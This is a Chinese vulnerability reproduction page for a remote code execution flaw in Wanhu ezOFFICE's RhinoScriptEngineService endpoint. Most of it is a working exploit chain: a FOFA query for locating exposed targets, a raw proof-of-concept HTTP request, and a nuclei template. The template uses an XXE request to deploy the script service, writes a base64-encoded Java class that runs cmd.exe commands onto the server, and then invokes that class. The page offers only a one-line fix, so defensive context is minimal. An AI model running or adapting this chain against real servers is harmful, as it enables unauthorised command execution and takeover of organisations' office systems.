万户ezoffice RhinoScriptEngineService接口rce漏洞复现
1.漏洞介绍
万户ezoffice RhinoScriptEngineService接口存在rce漏洞,可以直接控制服务器
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:app=“万户网络-ezOFFICE”
5.POC
POST http://127.0.0.1/services/./././RhinoScriptEngineService HTTP/1.1
Host: 127.0.0.1
User-Agent: Moziilla/5.0 (compatible; Yahoo! Slurp;http://help.yahoo.com/help/us/ysearch/slurp)
Connection: close
Content-Length: 1046
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Accept-Encoding: gzip, deflate, br
<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
<soapenv:Body>
<eval xmlns="http://127.0.0.1:8080/services/scriptEngine">
<arg0 xmlns="">
<![CDATA[
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
importPackage(Packages.java.net);
new URLClassLoader([new File('../server').toURL()]).loadClass('Test12').getConstructor([Class.forName("java.lang.String")]).newInstance(["ver"]).toString()
]]>
</arg0>
<arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
</arg1>
</eval>
</soapenv:Body>
</soapenv:Envelope>
nuclei检测
id: wanhu-ezoffice-rhinoscriptengineservice-rce
info:
name: 万户ezoffice RhinoScriptEngineService接口存在rce
author: monster
severity: critical
tags: wanhu,ezoffice,rce,oa
metadata:
fofa-query: app="万户网络-ezOFFICE"
verified: true
max-request: 3
http:
- raw:
- |
POST /defaultroot/xfservices/././././GeneralWeb HTTP/1.1
Host: {{Hostname}}
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
<soapenv:Header/>
<soapenv:Body>
<gen:OAManager>
<gen:input><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY x SYSTEM "http://127.0.0.1:{{Port}}/defaultroot/services/./././AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment">]>
<root>&x;</root>
</gen:input>
</gen:OAManager>
</soapenv:Body>
</soapenv:Envelope>
- |
POST /defaultroot/services/./././RhinoScriptEngineService HTTP/1.1
Host: {{Hostname}}
User-Agent: Moziilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
<soapenv:Body>
<eval xmlns="http://127.0.0.1:8080/services/scriptEngine">
<arg0 xmlns="">
<![CDATA[
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.javax.crypto);
importPackage(Packages.sun.misc);
importPackage(Packages.sun.reflect.misc);
importPackage(Packages.javax.crypto.spec);
var file = new File("../server/Test12.class");
var fos = new FileOutputStream(file);
var base64Decoder = new BASE64Decoder();
var decodeContent = base64Decoder.decodeBuffer("yv66vgAAADIAcwoADgA2CAA3CQAfADgIADkKAAcAOggAOwcAPAcAPQcAPgcAPwkAQABBCgAHAEIKAEMARAcARQgARggARwoAQABICgBDAEkHAEoKABMASwcATAoAFQA2CgBNAE4KABUATwoAFQBQCgBNAFEKAAoAUgcAUwcAVAoAHQBVBwBWAQAGcmVzdWx0AQASTGphdmEvbGFuZy9TdHJpbmc7AQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEADVN0YWNrTWFwVGFibGUHAFYHAD8HADwHAFcHAEoHAFgHAFkHAEwHAFMBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAApTb3VyY2VGaWxlAQAgVGVzdDEyLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMACIAWgEAAAwAIAAhAQAVamF2YS5sYW5nLlByb2Nlc3NJbXBsDABbAFwBAAVzdGFydAEAD2phdmEvbGFuZy9DbGFzcwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAA1qYXZhL3V0aWwvTWFwAQAQamF2YS9sYW5nL1N0cmluZwcAXQwAXgBfDABgAGEHAFcMAGIAYwEAEGphdmEvbGFuZy9PYmplY3QBAAdjbWQuZXhlAQACL2MMAGQAZQwAZgBnAQARamF2YS9sYW5nL1Byb2Nlc3MMAGgAaQEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwBYDABqAGsMAGwAbQwAbgBvDABwAFoMACIAcQEAE2phdmEvbGFuZy9FeGNlcHRpb24BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgwAIgByAQAGVGVzdDEyAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9pby9JbnB1dFN0cmVhbQEAAltCAQADKClWAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABFqYXZhL2xhbmcvQm9vbGVhbgEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAFY2xvc2UBAAUoW0IpVgEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAB8ADgAAAAEAAAAgACEAAAADAAEAIgAjAAEAJAAAAWcACQAKAAAAxSq3AAEqEgK1AAMSBLgABU0sEgYHvQAHWQMTAAhTWQQTAAlTWQUTAApTWQayAAtTtgAMTi0EtgANLQEHvQAOWQMGvQAKWQMSD1NZBBIQU1kFK1NTWQQBU1kFAVNZBgO4ABFTtgASwAATOgQZBLYAFDoFAzYGEQQAvAg6B7sAFVm3ABY6CBkFGQe2ABdZNgaeABAZCBkHAxUGtgAYp//pGQi2ABk6CRkFtgAaKrsAClkZCbcAG7UAA6cADU27AB1ZLLcAHr+xAAEACgC3ALoAHAACACUAAABOABMAAAAMAAQACgAKAA4AEAAPADMAEAA4ABEAagASAHEAEwB0ABQAewAVAIQAFgCRABcAngAZAKUAGgCqABsAtwAeALoAHAC7AB0AxAAfACYAAAA0AAT/AIQACQcAJwcAKAcAKQcAKgcAKwcALAEHAC0HAC4AABn/ABsAAgcAJwcAKAABBwAvCQABADAAMQABACQAAAAdAAEAAQAAAAUqtAADsAAAAAEAJQAAAAYAAQAAACMACQAyADMAAQAkAAAAGQAAAAEAAAABsQAAAAEAJQAAAAYAAQAAACgAAQA0AAAAAgA1");
fos.write(decodeContent, new Integer(0), new Integer(decodeContent.length));
fos.close();
]]>
</arg0>
<arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
</arg1>
</eval>
</soapenv:Body>
</soapenv:Envelope>
- |
POST //defaultroot/services/./././RhinoScriptEngineService HTTP/1.1
Host: {{Hostname}}
User-Agent: Moziilla/5.0 (compatible; Yahoo! Slurp;http://help.yahoo.com/help/us/ysearch/slurp)
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
<soapenv:Body>
<eval xmlns="http://127.0.0.1:8080/services/scriptEngine">
<arg0 xmlns="">
<![CDATA[
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
importPackage(Packages.java.net);
new URLClassLoader([new File('../server').toURL()]).loadClass('Test12').getConstructor([Class.forName("java.lang.String")]).newInstance(["ver"]).toString()
]]>
</arg0>
<arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice">
</arg1>
</eval>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: dsl
dsl:
- "status_code_1 == 500 && contains(body_1, 'java.lang.NullPointerException')"
- "status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3, 'Microsoft Windows')"
condition: and
# 在第三个包 110行 执行命令,默认执行的命令为ver
6.修复建议
更新到最新版本